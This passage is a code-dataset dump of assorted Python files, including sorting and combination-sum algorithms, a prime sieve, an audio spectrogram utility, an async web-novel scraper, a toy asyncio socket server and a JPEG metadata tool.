newcounts)\n","sub_path":"linked_lists/python/llist.py","file_name":"llist.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"270135336","text":"\"\"\"\nGiven a menu (list of items prices), find all possible combinations of items \nthat sum a particular value K.\n\nReturn the combination with the minimum number of items. \nTime complexity O(MN), where M is the target value and N is the number of \ndistinct items. Space complexity O(M).\n\"\"\"\ndef item_combinations(prices, target):\n \"\"\"\n Find all the combinations that sum to target.\n \"\"\"\n res, cur = set([]), []\n \n def backtrack(target, start):\n if abs(target) < 0.01:\n res.add(tuple(cur))\n elif target > 0:\n for pos in range(start, len(prices)):\n cur.append(prices[pos])\n backtrack(target - prices[pos], pos)\n cur.pop()\n \n backtrack(target, 0)\n return res\n \n\ndef least_item_combination(prices, target):\n \"\"\"\n Return the size of combination with least number of items.\n dp[k] = min(dp[k], dp[k-n] + 1) for all n <= k and n in items.\n O(tn) time where t is target and n is the number of items, O(t) space.\n \"\"\"\n # convert the input to integer for precision purposes\n target = int(target * 100)\n prices = [int(p * 100) for p in prices]\n count = [target for _ in range(target + 1)]\n count[0] = 0 # empty set sum to 0\n for i in range(1, len(count)):\n for p in prices:\n if p <= i:\n count[i] = min(count[i], count[i - p] + 1)\n return count[-1]\n \n \n# test\nimport unittest\nclass Tester(unittest.TestCase):\n def setUp(self):\n self.arr1 = [2.1, 2.4, 3.0, 4.0, 4.2, 5.0] \n self.arr2 = [2, 3, 4, 5]\n \n def testCombination(self):\n res1 = item_combinations(self.arr1, 8.4)\n expect1 = set([\n (2.1, 2.1, 2.1, 2.1), (2.4, 3.0, 3.0), (2.1, 2.1, 4.2), (4.2, 4.2),\n ])\n self.assertEqual(res1, expect1)\n res2 = item_combinations(self.arr2, 8)\n expect2 = set([\n (2, 2, 2, 2), (2, 2, 4), (2, 3, 3), (4, 4), (3, 5)\n ])\n self.assertEqual(res2, expect2)\n \n def testLeastCombination(self):\n self.assertEqual(2, least_item_combination(self.arr1, 7.4))\n self.assertEqual(2, least_item_combination(self.arr2, 8))\n \nunittest.main()\n","sub_path":"src/main/python/company/menu_combination_sum.py","file_name":"menu_combination_sum.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"432354828","text":"#!/usr/bin/env python\nimport math\nimport time\nn = int(input('Please input range: '))\na = []\nfor i in range(n + 1):\n a.append(i)\na[1] = 0\nrt = int(math.sqrt(n))\ncnt = 0\nstart = time.time()\nfor i in range(2, rt + 1, 1):\n #cnt += 1\n for j in range(i * i, n + 1, i):\n #输出多少个零则有多少个数被重复筛选,需要进一步优化,保证每个数只被筛选一次\n #print(a[j])\n a[j] = 0\n #cnt += 1\nstop = time.time()\nprint(\"----------split line----------\")\nprint(list(filter(lambda x:x > 0,a)))\nprint(\"calc times: \" + str(cnt))\nprint(\"duration: \" + str((stop-start)*1000))\n","sub_path":"sievePrime.py","file_name":"sievePrime.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"468030365","text":"#Maddy Chan 11/28/15\n#sorts, sorts, sorts!\n#sorts take a list and a greater than function\n#the greater than function is there so that the sort will work for any data type\n\nfrom collections import defaultdict\n\ndef gtInt(a:int,b:int) -> bool:\n return a > b\n\n#selection sort - mutates list\n\ndef selection(l: list, gt) -> None:\n for i in range(len(l)):\n minIndex = i\n for j in range(i+1, len(l)):\n if gt(l[minIndex],l[j]):\n minIndex = j\n l[minIndex], l[i] = l[i], l[minIndex]\n\n#insertion sort - mutates list\n\ndef insertion(l:list, gt) -> None:\n for i in range(1,len(l)):\n comp_index, current = i-1, i\n while comp_index >=0 and gt(l[comp_index],l[current]):\n l[current], l[comp_index] = l[comp_index], l[current]\n comp_index -=1\n current -=1\n\n\n#merge sort - returns sorted list\n\ndef merge(l: list, gt) -> list:\n #if base case of one element, return that element\n if len(l) == 1:\n return l\n \n #setting variables - halfpoint, answer list, the sorted front and back arrays\n half, answer = int(len(l)/2), []\n front, back = merge(l[:half],gt), merge(l[half:],gt)\n\n #merging the two sorted lists into one\n while len(front) != 0 and len(back) != 0:\n if gt(front[0],back[0]):\n answer.append(back[0])\n back.pop(0)\n else:\n answer.append(front[0])\n front.pop(0)\n\n #adding the last leftover element\n answer.append(front[0] if len(front) == 1 else back[0])\n return answer\n\n#bucket sort - returns sorted list\n\ndef bucket(l:list) -> list:\n answer_dict, answer = defaultdict(int), []\n for a in l:\n answer_dict[a] +=1\n for a in sorted(answer_dict.keys()):\n for i in range(answer_dict[a]):\n answer.append(a)\n return answer\n\n#quick sort - returns sorted list - NOT DONE YET\n\n##def quick(l:list, gt):\n## if len(l) == 1 or len(l) == 0:\n## return l\n## pivot = l[-1]\n## start = 0\n## end = len(l)-1\n## while(start != end):\n## while gt(pivot,l[start]) and start < end:\n## start+=1\n## while gt(l[end],pivot) and end > start:\n## end-=1\n## l[start],l[end] = l[end],l[start]\n## answer = quick(l[0:start],gt)\n## answer.append(l[start])\n## answer.extend(quick(l[end+1:],gt))\n## return answer\n \n\n#l = [3,2,5,4,2,3,5,4,3,1]\nl = [3,2,4,5,1,6,9,7,8]\n#l = ['a','b','c','y','t','e','j']\n#print(merge(l,gtInt))\n#print(quick(l,gtInt))\n#insertion(l,gtInt)\n#print(l)\n","sub_path":"sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"243586157","text":"# Calculator App using Pygame\n\nimport pygame\n\n\ndef main():\n pygame.init()\n window_size = (1290, 800)\n pygame.display.set_mode(window_size)\n pygame.display.set_caption(\"Calculator\")\n window_surface = pygame.display.get_surface()\n game = Game(window_surface)\n game.play()\n pygame.quit()\n\nclass Game:\n def __init__(self, surface):\n # game specific variables\n self.surface = surface\n self.continue_game = True\n self.clock = pygame.time.Clock()\n self.fps = 60\n\n def play(self):\n while self.continue_game:\n self.clock.tick(self.fps)\n self.event_handler()\n self.draw()\n\n def event_handler(self):\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n self.continue_game = False\n\n def draw(self):\n pygame.display.update()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"25078161","text":"from dinterpol import Template\nfrom sys import stderr\nfrom traceback import print_exc\nfrom pprint import pformat\n\n\nclass PluginRuntimeCore(object):\n\n def __init__(self, config=None):\n self.initial_config = config\n self.config_template = Template(config)\n self.failed_count = 0\n self.init()\n\n def _on_input(self, item):\n try:\n if item is not None:\n self.config = self.config_template.render(item)\n except: # NOQA: E722\n print_exc(file=stderr)\n msg = (\n \"---------- Plugin %s dynamic config resolution failed ----------\" % self.plugin_label)\n print(msg, file=stderr)\n print(pformat(item), file=stderr)\n # raise(\n self.failed_count += 1\n exit(1)\n if item is None:\n on_complete_func = getattr(self, 'on_complete', None)\n if on_complete_func:\n on_complete_func()\n self.put(item)\n else:\n try:\n self.on_input(item)\n except SystemExit:\n exit(1)\n except: # NOQA: E722\n self._execution_error(item)\n finally:\n if self.failed_count != 0:\n exit(1)\n\n def _execution_error(self, item):\n print_exc(file=stderr)\n msg = (\n \"---------- Plugin %s execution failed ----------, item content:\"\n % (self.plugin_label))\n print(msg, file=stderr)\n print(pformat(item), file=stderr)\n self.failed_count += 1\n","sub_path":"mdatapipe/core/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"252178414","text":"_base_ = [\n '../_base_/models/convnext_v2/atto.py',\n '../_base_/datasets/imagenet_bs64_swin_224.py',\n '../_base_/schedules/imagenet_bs1024_adamw_swin.py',\n '../_base_/default_runtime.py',\n]\n\n# dataset setting\ntrain_dataloader = dict(batch_size=32)\n\n# schedule setting\noptim_wrapper = dict(\n optimizer=dict(lr=8e-4, weight_decay=0.3),\n clip_grad=None,\n)\n\n# learning policy\nparam_scheduler = [dict(type='CosineAnnealingLR', eta_min=1e-5, by_epoch=True)]\n\n# train, val, test setting\ntrain_cfg = dict(by_epoch=True, max_epochs=600, val_interval=1)\n\n# runtime setting\ncustom_hooks = [dict(type='EMAHook', momentum=1e-4, priority='ABOVE_NORMAL')]\n","sub_path":"configs/convnext_v2/convnext-v2-atto_32xb32_in1k.py","file_name":"convnext-v2-atto_32xb32_in1k.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"249165523","text":"\"\"\"\nSummary: Recover spectrogram to wave.\nAuthor: Qiuqiang Kong\nCreated: 2017.09\nModified: -\n\"\"\"\nimport numpy as np\nimport numpy\nimport decimal\n\ndef recover_wav(pd_abs_x, gt_x, n_overlap, winfunc, wav_len=None, irr_mask=False):\n \"\"\"Recover wave from spectrogram.\n If you are using scipy.signal.spectrogram, you may need to multipy a scaler\n to the recovered audio after using this function. For example,\n recover_scaler = np.sqrt((ham_win**2).sum())\n\n Args:\n pd_abs_x: 2d array, (n_time, n_freq)\n gt_x: 2d complex array, (n_time, n_freq)\n n_overlap: integar.\n winfunc: func, the analysis window to apply to each frame.\n wav_len: integer. Pad or trunc to wav_len with zero.\n\n Returns:\n 1d array.\n \"\"\"\n \n if irr_mask:\n x = pd_abs_x * np.abs(gt_x)\n else:\n x = pd_abs_x\n \n x = real_to_complex(x, gt_x)\n x = half_to_whole(x)\n \n frames = ifft_to_wav(x)\n (n_frames, n_window) = frames.shape\n s = deframesig(frames=frames, siglen=0, frame_len=n_window,\n frame_step=n_window-n_overlap, winfunc=winfunc)\n if wav_len:\n s = pad_or_trunc(s, wav_len)\n return s\n\ndef real_to_complex(pd_abs_x, gt_x):\n \"\"\"Recover pred spectrogram's phase from ground truth's phase.\n\n Args:\n pd_abs_x: 2d array, (n_time, n_freq)\n gt_x: 2d complex array, (n_time, n_freq)\n\n Returns:\n 2d complex array, (n_time, n_freq)\n \"\"\"\n theta = np.angle(gt_x)\n cmplx = pd_abs_x * np.exp(1j * theta)\n return cmplx\n\ndef half_to_whole(x):\n \"\"\"Recover whole spectrogram from half spectrogram.\n \"\"\"\n return np.concatenate((x, np.fliplr(np.conj(x[:, 1:-1]))), axis=1)\n\ndef ifft_to_wav(x):\n \"\"\"Recover wav from whole spectrogram\"\"\"\n return np.real(np.fft.ifft(x))\n\ndef pad_or_trunc(s, wav_len):\n if len(s) >= wav_len:\n s = s[0 : wav_len]\n else:\n s = np.concatenate((s, np.zeros(wav_len - len(s))))\n return s\n\ndef recover_gt_wav(x, n_overlap, winfunc, wav_len=None):\n \"\"\"Recover ground truth wav.\n \"\"\"\n x = half_to_whole(x)\n frames = ifft_to_wav(x)\n (n_frames, n_window) = frames.shape\n s = deframesig(frames=frames, siglen=0, frame_len=n_window,\n frame_step=n_window-n_overlap, winfunc=winfunc)\n if wav_len:\n s = pad_or_trunc(s, wav_len)\n return s\n\ndef deframesig(frames,siglen,frame_len,frame_step,winfunc=lambda x:numpy.ones((x,))):\n \"\"\"Does overlap-add procedure to undo the action of framesig.\n Ref: From https://github.com/jameslyons/python_speech_features\n\n :param frames: the array of frames.\n :param siglen: the length of the desired signal, use 0 if unknown. Output will be truncated to siglen samples.\n :param frame_len: length of each frame measured in samples.\n :param frame_step: number of samples after the start of the previous frame that the next frame should begin.\n :param winfunc: the analysis window to apply to each frame. 
By default no window is applied.\n :returns: a 1-D signal.\n \"\"\"\n frame_len = round_half_up(frame_len)\n frame_step = round_half_up(frame_step)\n numframes = numpy.shape(frames)[0]\n assert numpy.shape(frames)[1] == frame_len, '\"frames\" matrix is wrong size, 2nd dim is not equal to frame_len'\n\n indices = numpy.tile(numpy.arange(0,frame_len),(numframes,1)) + numpy.tile(numpy.arange(0,numframes*frame_step,frame_step),(frame_len,1)).T\n indices = numpy.array(indices,dtype=numpy.int32)\n padlen = (numframes-1)*frame_step + frame_len\n\n if siglen <= 0: siglen = padlen\n\n rec_signal = numpy.zeros((padlen,))\n window_correction = numpy.zeros((padlen,))\n win = winfunc(frame_len)\n\n for i in range(0,numframes):\n window_correction[indices[i,:]] = window_correction[indices[i,:]] + win + 1e-15 #add a little bit so it is never zero\n rec_signal[indices[i,:]] = rec_signal[indices[i,:]] + frames[i,:]\n\n rec_signal = rec_signal/window_correction\n return rec_signal[0:siglen]\n\ndef round_half_up(number):\n return int(decimal.Decimal(number).quantize(decimal.Decimal('1'), rounding=decimal.ROUND_HALF_UP))\n","sub_path":"mixture2clean_dnn/spectrogram_to_wave.py","file_name":"spectrogram_to_wave.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"419896939","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nimport re\nimport time\nimport os.path\nimport logging\nimport asyncio\nimport aiohttp\nimport requests\nimport urllib3\nimport tqdm\nimport shutil\n\nURL = 'http://www.9dxs.com/3/3024/'\nDIR_PATH = '_tmp'\nCHAPTER_ENCODING = 'utf8'\nCONTENT_ENCODING = 'utf8'\n\nHEADERS = {\n \"User-Agent\": (\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.3\"\n \"6 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\"),\n \"Accept\": (\"text/html,application/xhtml+xml,application/xml;q=0.9,image/we\"\n \"bp,image/apng,*/*;q=0.8\")\n}\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(level=logging.INFO)\nhandler = logging.FileHandler(\"log.txt\", encoding='utf8')\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s'\n ' - %(message)s')\nhandler.setFormatter(formatter)\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.ERROR)\n\nlogger.addHandler(handler)\nlogger.addHandler(console)\n\nsema = asyncio.BoundedSemaphore(5)\n\n\nclass AsnycSpider():\n def __init__(self, url, downloaddir=DIR_PATH):\n parse_string = urlparse(url)\n if parse_string.scheme == 'https':\n self.SSL = True\n else:\n self.SSL = False\n self.url = url + '/' if not url.endswith('/') else url\n self.chapter_list = list()\n self.downloaddir = downloaddir\n\n def download(self, first, last):\n self.__get_chapters(first, last)\n self.eventloop()\n\n def get_absolute_path(self, path):\n pattern = re.compile(r\"^.*/\")\n return re.sub(pattern, \"\", path)\n\n def __get_first_html(self, url_str):\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n response = requests.get(url_str, headers=HEADERS, verify=self.SSL)\n return response.text.encode(response.encoding).decode(CHAPTER_ENCODING)\n\n def __get_chapters(self, first=None, last=None):\n begin = time.time()\n time_str = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(begin))\n print('First Page Job at {}.'.format(time_str))\n html_string = self.__get_first_html(self.url + 'index.html')\n chapters = self.parse_chapter(html_string)\n first = 0 if first is None else first\n last = len(chapters) if last is None else last\n self.chapter_list = chapters[first:last]\n end = time.time()\n print('First Page take {:.4} seconds.'.format(end - begin))\n\n async def get_content_from_url(self, url):\n respdata = ''\n try:\n async with aiohttp.ClientSession() as session:\n async with sema, session.get(url, headers=HEADERS,\n timeout=300) as r:\n if r.status == 200:\n respdata = await r.text(encoding=CONTENT_ENCODING,\n errors='ignore')\n else:\n logging.error(\n '{} is blocked, status code: '.format(url),\n r.status)\n except Exception as e:\n logging.exception('Error for {}'.format(e), exc_info=True)\n return respdata\n\n async def handle_tasks(self, task_id, work_queue):\n while not work_queue.empty():\n current_url = await work_queue.get()\n try:\n await self.process_request(current_url)\n except Exception as e:\n logging.exception('Error for {}'.format(e), exc_info=True)\n\n def eventloop(self):\n start = time.time()\n timestr = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(start))\n print('Start Download Job at {}.'.format(timestr))\n q = asyncio.Queue()\n [q.put_nowait(url) for url in self.chapter_list]\n loop = asyncio.get_event_loop()\n tasks = [\n self.handle_tasks(\n task_id,\n q,\n ) for task_id in range(len(self.chapter_list))\n ]\n 
loop.run_until_complete(self.wait_with_progress(tasks))\n end = time.time()\n print('Total take {:.4} seconds.'.format(end - start))\n loop.close()\n\n async def wait_with_progress(self, tasks):\n return [\n await f for f in tqdm.tqdm(\n asyncio.as_completed(tasks), ascii=True, total=len(tasks))\n ]\n\n async def process_request(self, url):\n html = await self.get_content_from_url(url['href'])\n formated_html = self.parse_content(url['text'], html)\n target_file = os.path.join(self.downloaddir,\n self.__get_filename(url['href']) + '.txt')\n filename = os.path.abspath(target_file)\n self.__save_to_file(self.custom_strip(formated_html), filename,\n url['text'])\n return 'Completed'\n\n def __get_filename(self, m):\n pattern = re.compile(r'http.*/(\\d*).html')\n items = re.findall(pattern, m)\n if (items):\n return items[0]\n else:\n return ''\n\n def custom_strip(self, x):\n remove_tag1 = re.compile(r' ')\n remove_tag2 = re.compile(r' ')\n x = re.sub(remove_tag1, '\\n', x)\n x = re.sub(remove_tag2, ' ', x)\n return x.strip()\n\n def __save_to_file(self, content, fileName, title):\n path = os.path.dirname(fileName)\n if not os.path.exists(path):\n os.makedirs(path)\n with open(fileName, 'w', encoding='utf-8') as f:\n logger.info('Write {} ==> {} successful.'.format(title, fileName))\n f.write(content)\n\n def merge_file(self, filename):\n target_list = os.path.abspath(os.path.join(self.downloaddir))\n filelist = os.listdir(target_list)\n filelist.sort()\n with open(filename, 'w', encoding='utf-8') as outfile:\n for fname in tqdm.tqdm(filelist, ascii=True):\n real_file = os.path.abspath(\n os.path.join(self.downloaddir, fname))\n with open(real_file, 'r', encoding='utf-8') as infile:\n for line in infile:\n outfile.write(line)\n outfile.write('\\n\\n')\n logger.info('Write {} successful.'.format(real_file))\n shutil.rmtree(self.downloaddir, ignore_errors=True)\n\n def parse_content(self, title, html):\n return ''\n\n def parse_chapter(self, html):\n return ''\n\n\nclass NovelSpider(AsnycSpider):\n def __init__(self, url, downloaddir=DIR_PATH):\n super().__init__(url, downloaddir=downloaddir)\n\n def parse_content(self, title, html):\n formated_html = ''\n try:\n soup = BeautifulSoup(html, 'lxml')\n content = soup.find(\"div\", attrs={\"class\": \"content\"})\n content = content.get_text('\\n\\n ', strip=True)\n formated_html = '{}\\n\\n{}'.format(title, content)\n except Exception as e:\n raise e\n return formated_html\n\n def parse_chapter(self, html):\n chapter_list = list()\n try:\n soup = BeautifulSoup(html, 'lxml')\n chapter_div = soup.find(id='novel56235')\n hrefs = chapter_div.find_all('dd')\n chapter_list = [{\n 'href':\n self.url + self.get_absolute_path(i.find('a').get('href')),\n 'text':\n i.find('a').text\n } for i in hrefs if i.find('a')]\n except Exception as e:\n raise e\n return chapter_list\n\n def custom_strip(self, x):\n # remove_tag1 = re.compile(r'( | )+')\n # remove_tag2 = re.compile(r'( ){4}')\n # x = re.sub(remove_tag1, '\\n\\n', x)\n # x = re.sub(remove_tag2, '\\n\\n', x)\n return x.strip()\n\n\nif __name__ == \"__main__\":\n spider = NovelSpider('https://www.77nt.com/56235/')\n spider.download(4100, 4102)\n spider.merge_file(\"target.txt\")\n","sub_path":"gaishidizun.py","file_name":"gaishidizun.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"494107772","text":"#coding:utf-8\nimport socket\nimport time\nfrom selectors import DefaultSelector, EVENT_READ, EVENT_WRITE\nselector = DefaultSelector()\n\nstopped = False\n\nresponse = b'HTTP/1.0 200 OK\\r\\nDate: Mon, 1 Jan 1996 01:01:01 GMT\\r\\n'\nresponse += b'Content-Type: text/plain\\r\\nContent-Length: 13\\r\\n'\nresponse += b'hello world'\n\nclass Future:\n def __init__(self):\n self.result = None\n self._callback = []\n\n def add_done_callback(self, fn):\n self._callback.append(fn)\n\n def set_result(self, result):\n self.result = result\n for fn in self._callback:\n fn(self)\n\n def __iter__(self):\n yield self\n return self.result\n\n\nclass Task:\n def __init__(self, coro):\n self.coro = coro\n f = Future()\n f.set_result(None)\n self.step(f)\n\n def step(self, future):\n try:\n next_future = self.coro.send(future.result)\n print(\"next_future: \", next_future)\n except StopIteration as e:\n print(\"step stop :\", e.value)\n return\n\n next_future.add_done_callback(self.step)\n\n\nclass ConHandler(object):\n def __init__(self, con, addr):\n self.con = con # 新连接实例\n self.addr = addr # 新连接地址\n\n def _read_ready(self):\n f = Future()\n\n def sock_read(): # 由于没有解析相应的流协议,所以这里直接接受所有的数据,\n # 如果解析具体协议也可以改写成协程\n all_data = b\"\" # 接受数据\n while True: # 一直接受数据直到数据接受完成\n try:\n data = self.con.recv(10)\n if data:\n print(\"recv data : \", data)\n all_data += data\n else:\n print(\"break while\")\n break\n except BlockingIOError:\n print(\"BlockingIOError\")\n break\n print(\"all_data\", all_data)\n # selector.unregister(self.con.fileno())\n f.set_result(None) # 当数据接受完成后,调用f实例的回调方法,进入将主流程往下执行一步\n\n selector.register(self.con.fileno(), EVENT_READ, sock_read) # 注册连接的读事件并注册回调函数\n yield f\n selector.unregister(self.con.fileno()) # 取消连接的注册事件\n\n def fetch(self):\n # 读事件到来一次读完\n fu = yield from self._read_ready() # 调用读数据\n print(\"recv_data: \", fu)\n # handler 处理请求\n self.response = response*10000\n time.sleep(1)\n result = yield from self.sock_send_all() # 将处理的数据发送出去\n print(\"send after : \", result)\n\n def sock_send_all(self):\n send_length = yield from self.sock_send() # 发送相应数据,返回发送的数据长度\n self.response = self.response[send_length:] # 减去已经发送的数据长度\n while send_length: # 如果发送长度不为0\n send_length = yield from self.sock_send() # 继续发送数据\n self.response = self.response[send_length:] # 减去已经发送的数据长度\n return\n\n def sock_send(self):\n f = Future()\n\n def _sock_send():\n con_length = self.con.send(self.response)\n f.set_result(con_length)\n selector.register(self.con.fileno(), EVENT_WRITE, _sock_send)\n send_length = yield f\n selector.unregister(self.con.fileno())\n return send_length\n\n\ndef create_server():\n sock = socket.socket() # 创建连接\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # 设置端口重用\n sock.bind(('0.0.0.0', 8080)) # 设置监听连接端口\n sock.listen(10) # 设置监听缓存区\n sock.setblocking(0) # 设置连接非阻塞\n\n def sock_accept(): # 如果sock的新请求连接处理回调函数\n try:\n conn, addr = sock.accept() # 接受新请求\n conn.setblocking(False) # 设置接受新连接非阻塞\n print(conn)\n except Exception:\n pass\n Task(ConHandler(conn, addr).fetch()) # 用任务类包裹处理流程,使之流程协程处理\n\n selector.register(sock.fileno(), EVENT_READ, sock_accept) # 注册sock的连接读事件并设置读事件的回调函数\n\n\ndef loop():\n while not stopped:\n events = selector.select() # 获取触发的事件\n for event_key, event_mask in events:\n callback = event_key.data # 获取触发事件的回调函数\n callback() # 执行回调函数\n\nif __name__ == '__main__':\n create_server()\n 
loop()","sub_path":"advance/socket/server_s4.py","file_name":"server_s4.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"624235196","text":"#!/usr/bin/env python3\n\n\"\"\"\npython semestral work\nTomas Dvoracek\ndvorato9@fit.cvut.cz\nFaculty of Information Technology\nCzech Technical University in Prague\n\nProgram for saving/extracting metadata to/from jpeg.\n\nISSUES:\n some programs erase APP data - IfranView for example \n\"\"\"\nimport os\nimport sys\nfrom argparse import ArgumentParser\nfrom PIL import Image\n\n\n# Functions\n# ------------------------------------------------------------------------------\ndef check_file(file_name, file_mode):\n \"\"\"\n Function checks if file exists and is accessible with provided mode.\n\n :param file_name: string with path to file\n :param file_mode: os constant, for example os.R_OK\n :return: Returns False if file does not exists or is not accessible\n \"\"\"\n if os.path.isfile(file_name) and os.access(file_name, file_mode):\n return True\n return False \n\n\n# ------------------------------------------------------------------------------\ndef get_metadata(data):\n \"\"\"\n Reads all metadata and data.\n\n Function count all APP0-15 (ffe{0-f}) and comment (fffe) as metadata. Start of\n image is any other header then these. Usually it is start of quantization\n table (ffdb).\n\n :param data: Bytes representing jpeg file, pass WITHOUT 2 first bytes (FFD8)\n :return: list of (header, metadata), bytes(image_data) \n \"\"\"\n index = 0\n # create list of metadata headers\n metadata_list = list()\n metadata_header_list = ['ffe'+str(i) for i in range(10)]\n metadata_header_list += ['ffe'+chr(ord(str(i)) + ord('a')) for i in range(6)]\n metadata_header_list.append('fffe')\n \n while True:\n # HEADER TYPE = 2B | DATA LENGTH + 2 = 2B | DATA\n # length of data and header, but\n # t81 says, it should be only length of following data\n header = data[index:index+2].hex()\n length = int(data[index+2:index+4].hex(), base=16)\n if length < 2:\n print(\"Corrupted metadata.\", file=sys.stderr)\n exit(9)\n if header in metadata_header_list:\n metadata_list.append((header, data[index:index+2+length]))\n # shift to next header\n index = index + 2 + length\n else:\n break\n \n return metadata_list, data[index:]\n\n\n# ------------------------------------------------------------------------------\ndef pack_data(original_file_name, metadata_file_name, output_file_name):\n \"\"\"\n Create new file with metadata.\n\n Function reads original file, crops it and copy metadata from original file,\n because they are lost during cropping. Then it replaces part of original\n metadata stored in APP3 with metadata specified in metadata_file. 
Image is\n saved as output_file_name.\n\n :param original_file_name: string with path to original file\n :param metadata_file_name: string with path to metadata file\n :param output_file_name: string with path to output file\n :return: None\n \"\"\"\n with open(original_file_name, mode='rb') as original_file:\n original_file_bytes = original_file.read()\n\n with open(metadata_file_name, mode='rb') as metadata_file:\n metadata_file_bytes = metadata_file.read()\n\n if original_file_bytes[:3].hex() != 'ffd8ff':\n print('This is not a jpeg file.', file=sys.stderr)\n exit(7)\n\n # crop image, copying as much metadata as possible with pillow\n image = Image.open(original_file_name) \n # cropping left half of image\n new_image = image.crop((0, 0, image.size[0]/2, image.size[1]))\n try:\n new_image.save(output_file_name, 'JPEG', icc_profile=image.info.get('icc_profile'),\n exif=image.info.get('exif'), quality=95)\n except OSError:\n print('Problem when cropping image with pillow. Do not hate me, hate them.',\n file=sys.stderr)\n exit(8) \n \n with open(output_file_name, mode='rb') as output_file:\n output_file_bytes = output_file.read()\n\n # read current APP0-2, remove APP3, read rest of file\n # write in order, because some programs then do not work \n # with exif metadata correctly\n input_metadata, dummy = get_metadata(original_file_bytes[2:])\n output_metadata, data_after = get_metadata(output_file_bytes[2:])\n \n metadata_list = list()\n # split metadata to blocks. max APP block size is 65535 B\n # 2B - header length, 4B - string with block info, 1B - null byte = 7 B\n # Data itself have 65535 - 7 = 65528\n for index in range((len(metadata_file_bytes)//65528)+1):\n metadata_list.append(metadata_file_bytes[index*65528:(index+1)*65528]) \n \n # write jpeg start of image\n with open(output_file_name, mode='wb') as output_file:\n output_file.write(bytes.fromhex('ffd8'))\n\n # APP metadata that should be stored before my metadata\n # some programs have problems with metadata blocks not in order\n # APP0 - APP1 from changed file after cropping\n for index in output_metadata:\n if index[0] == 'ffe0' or index[0] == 'ffe1':\n output_file.write(index[1])\n \n # APP2 from original file\n # Exif data - they are changed during cropping\n for index in input_metadata:\n if index[0] == 'ffe2':\n output_file.write(index[1])\n\n # write my own metadata\n for index in metadata_list:\n # header of APP3\n output_file.write(bytes.fromhex('ffe3'))\n # length of data segment with name and null byte\n output_file.write((7 + len(index)).to_bytes(2, byteorder='big'))\n # string description of APP segment with null byte at the end\n output_file.write(bytes('moje', 'ascii') + bytes.fromhex('00'))\n # write APP data\n output_file.write(index)\n \n # write rest of metadata APP4-APP15\n # (each marker must be its own list element, otherwise APP0-3 are duplicated)\n for index in input_metadata:\n if index[0] not in ['ffe0', 'ffe1', 'ffe2', 'ffe3']:\n output_file.write(index[1])\n\n # write rest of image from cropped file\n output_file.write(data_after)\n\n\n# ------------------------------------------------------------------------------\ndef extract_data(encoded_file_name, output_file_name):\n \"\"\"\n Extracts data from image.\n\n :param encoded_file_name: string with path to image with stored metadata\n :param output_file_name: string with path to new created file with metadata\n :return: None\n \"\"\"\n with open(encoded_file_name, mode='rb') as encoded_file:\n encoded_file_bytes = encoded_file.read()\n\n if encoded_file_bytes[:3].hex() != 'ffd8ff':\n print('This is not a jpeg file.', file=sys.stderr)\n exit(6)\n \n 
# read metadata, you do not need image data\n metadata_list, dummy = get_metadata(encoded_file_bytes[2:])\n\n with open(output_file_name, mode='wb') as output_file:\n for index in metadata_list:\n # write only APP3\n if index[0] == 'ffe3':\n # write if their header is not changed\n if (index[1][4:8].decode('ascii') == 'moje' and\n index[1][8] == 0):\n # write only data, not with header\n output_file.write(index[1][9:])\n\n\n# ------------------------------------------------------------------------------\ndef main():\n \"\"\"\n Main function for python semestral work.\n\n Function read arguments from command line and checks them. Then it checks\n file existence and permissions. Based on arguments it calls extract_data()\n or pack_data().\n \"\"\"\n\n # Arguments\n # ------------------------------------------------------------------------------\n parser = ArgumentParser(description=\"\"\"\n Program for adding metadata to half of stereoscopic image in JPEG. \n It can also decode data from previously created image. All custom\n metadata are stored in APP3, it erases old data stored there. \n Program does not erase any other data\"\"\", \n epilog=\"\"\"\n Exit codes:\n 1 = Metadata file not accessible\n 2 = image file not accessible\n 3 = Input file not selected\n 4 = No permission for write to output file\n 5 = File already exists, use override parameter or change name\n 6 = File to decode is not JPEG\n 7 = Image file is not JPEG\n 8 = Problem when cropping image.\n 9 = Metadata stored in image are corrupted\n \"\"\")\n\n parser.add_argument(\"-e\", \"--extract\", help=\"Data are \\\n going to be extracted from image. Otherwise added to image.\",\n action='store_true', default=False)\n\n parser.add_argument(\"-o\", \"--overwrite\", help=\"Overwrite existing 